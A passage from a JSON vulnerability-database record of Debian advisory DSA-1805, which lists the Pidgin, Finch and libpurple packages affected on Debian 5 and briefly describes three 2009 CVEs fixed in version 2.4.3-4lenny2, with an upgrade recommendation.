"ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_mipsel.deb", "packageName": "finch", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_armel.deb", "packageName": "libpurple0", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_powerpc.deb", "packageName": "libpurple0", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_amd64.deb", "packageName": "libpurple0", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_mips.deb", "packageName": "pidgin-dbg", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_ia64.deb", "packageName": "pidgin", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_alpha.deb", "packageName": "libpurple0", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_alpha.deb", "packageName": "pidgin", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_mipsel.deb", "packageName": "libpurple0", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple-dev_2.4.3-4lenny2_all.deb", "packageName": "libpurple-dev", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_i386.deb", "packageName": "pidgin-dbg", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_s390.deb", "packageName": "pidgin", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_powerpc.deb", "packageName": "finch", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_arm.deb", "packageName": "libpurple0", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_i386.deb", "packageName": "libpurple0", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dev_2.4.3-4lenny2_all.deb", "packageName": "pidgin-dev", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_hppa.deb", "packageName": "pidgin-dbg", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_arm.deb", "packageName": "finch", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_sparc.deb", "packageName": "libpurple0", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple-bin_2.4.3-4lenny2_all.deb", "packageName": "libpurple-bin", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_mips.deb", "packageName": "libpurple0", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_mipsel.deb", "packageName": "pidgin", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_amd64.deb", "packageName": "finch", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_i386.deb", "packageName": "pidgin", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_mips.deb", "packageName": "pidgin", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_armel.deb", "packageName": "finch", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3.orig", "packageFilename": "pidgin_2.4.3.orig.tar.gz", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2.diff", "packageFilename": "pidgin_2.4.3-4lenny2.diff.gz", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_hppa.deb", "packageName": "pidgin", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_mips.deb", "packageName": "finch", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_powerpc.deb", "packageName": "pidgin-dbg", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_s390.deb", "packageName": "libpurple0", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_sparc.deb", "packageName": "pidgin-dbg", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_sparc.deb", "packageName": "finch", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_i386.deb", "packageName": "finch", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_ia64.deb", "packageName": "libpurple0", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_arm.deb", "packageName": "pidgin-dbg", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_alpha.deb", "packageName": "pidgin-dbg", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_alpha.deb", "packageName": "finch", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_sparc.deb", "packageName": "pidgin", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_armel.deb", "packageName": "pidgin", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2.dsc", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_arm.deb", "packageName": "pidgin", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "libpurple0_2.4.3-4lenny2_hppa.deb", "packageName": "libpurple0", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_hppa.deb", "packageName": "finch", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_powerpc.deb", "packageName": "pidgin", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_s390.deb", "packageName": "finch", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin_2.4.3-4lenny2_amd64.deb", "packageName": "pidgin", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-data_2.4.3-4lenny2_all.deb", "packageName": "pidgin-data", "arch": "all", "operator": "lt"}], "description": "Several vulnerabilities have been discovered in Pidgin, a graphical multi-protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2009-1373](<https://security-tracker.debian.org/tracker/CVE-2009-1373>)\n\nA buffer overflow in the Jabber file transfer code may lead to denial of service or the execution of arbitrary code.\n\n * [CVE-2009-1375](<https://security-tracker.debian.org/tracker/CVE-2009-1375>)\n\nMemory corruption in an internal library may lead to denial of service.\n\n * [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>)\n\nThe patch provided for the security issue tracked as [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) \\- integer overflows in the MSN protocol handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source package name gaim. However, due to build problems the updated packages couldn't be released along with the stable version. It will be released once the build problem is resolved.\n\nFor the stable distribution (lenny), these problems have been fixed in version 2.4.3-4lenny2.\n\nFor the unstable distribution (sid), these problems have been fixed in version 2.5.6-1.\n\nWe recommend that you upgrade your pidgin packages.", "edition": 1, "reporter": "Debian", "published": "2009-05-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "pidgin -- several vulnerabilities", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "modified": "2009-05-22T00:00:00", "id": "DSA-1805", "href": "http://www.debian.org/security/dsa-1805", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
